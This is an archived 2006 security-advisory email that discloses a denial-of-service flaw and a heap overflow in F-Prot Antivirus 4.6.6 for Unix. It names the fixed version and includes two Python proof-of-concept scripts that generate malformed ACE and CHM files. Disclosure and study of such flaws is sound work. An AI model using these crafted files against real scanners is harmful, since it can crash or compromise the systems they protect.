[UNIX] F-Prot Antivirus Heap Overflow and DoS
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Dec 2006 17:27:32 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
F-Prot Antivirus Heap Overflow and DoS
------------------------------------------------------------------------
SUMMARY
Two vulnerabilities in
<http://www.f-prot.com/download/home_user/download_fplinux.html> F-Prot
Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause
a DoS or execute an arbitrary code.
DETAILS
1. ACE file Denial of Service When parsing a specially crafted ACE
compressed file F-Prot Antivirus will enter in an infinite loop.
See fprot1.py for more details.
2. CHM file heap overflow When parsing a specially crafted CHM file a heap
overflow will occur in F-Prot Antivirus.
See fprot2.py for more details.
Vendor Status:
Update to F-Prot version 4.6.7:
<http://www.f-prot.com/news/gen_news/061201_release_unix467.html>
http://www.f-prot.com/news/gen_news/061201_release_unix467.html
Exploits:
# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# To test this code on Linux:
#
# create ACE compressed file
# $ ./fprot1.py > 1.ace
# $ f-prot 1.ace
import sys
import struct
ACE="""
58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14
02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a
55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52
53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff
00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00
02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41
41 41 41 41 41
"""
s = ""
for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]:
s += i
sys.stdout.write(s)
# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm
import sys
import struct
s=""
s+="ITSF" # signature
s+=struct.pack("<L",3) # version
s+=struct.pack("<L",96) # header_len
s+=struct.pack("<L",1) # unknown
s+=struct.pack("<L",0x41424344) # last_modified
s+=struct.pack("<L",0x419) # lang_id
s+="A"*16 #dir_clsid
s+="B"*16 #stream_clsid
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset
s+="A"*24
s+="ITSP"
s+=struct.pack("<L", 1) # version
s+=struct.pack("<L",0x54) # header_len
s+=struct.pack("<L", 0xa) # unknown
s+=struct.pack("<L",1000) # block_len - BUG?
s+=struct.pack("<L",2) # blockidx
s+=struct.pack("<L", 1) # index_depth
s+=struct.pack("<L", -1) # index_root
s+=struct.pack("<L",0) # index_head
s+=struct.pack("<L",0) # index_tail
s+=struct.pack("<L", -1) # unknown2
s+=struct.pack("<L",1) # num_blocks
s+=struct.pack("<L", 1033) # lang_id
s+="A"*32
s+="B"*10000
sys.stdout.write(s)
ADDITIONAL INFORMATION
The original article can be found at:
<http://gleg.net/fprot.txt> http://gleg.net/fprot.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
- Next by Date: [NT] Microsoft Word Document Code Execution
- Previous by thread: [UNIX] Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
- Next by thread: [NT] Microsoft Word Document Code Execution
- Index(es):
Relevant Pages
- [EXPL] Kerio MailServer 6.2.2 preauth DoS (vd_kms6)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A problem in the way Kerio
MailServer handles incoming LDAP requests allow ... # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
DAMAGES OR ANY DAMAGES ... gdb backtrace: ... (Securiteam) - [EXPL] Monit Remote Shell Exploit (Long HTTP Request)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... sub usage { ...
my $shellcode; ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [UNIX] Local Buffer Overflow in REP (Long ARG)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * RedHat Linux 7.3 kernel
version 2.4.20, ... $ gdb rep ... In no event shall we be liable for any damages
whatsoever including direct, indirect, incidental, consequential, loss of business profits or special
damages. ... (Securiteam) - [EXPL] ARPUS/Ces Privilege Escalation (Setuid Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ** DISCLAIMER ** I am in
no way responsible for your stupidity. ... kfin80: it drops privs under certain conditions
... In no event shall we be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [EXPL] Microsoft Windows Metafile DoS (gdi32.dll, MS05-053, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... discovered in Windows Metafile
and Enhanced Metafile image ... unsigned char MetafileRECORD[] = ... In no event
shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages. ... (Securiteam)
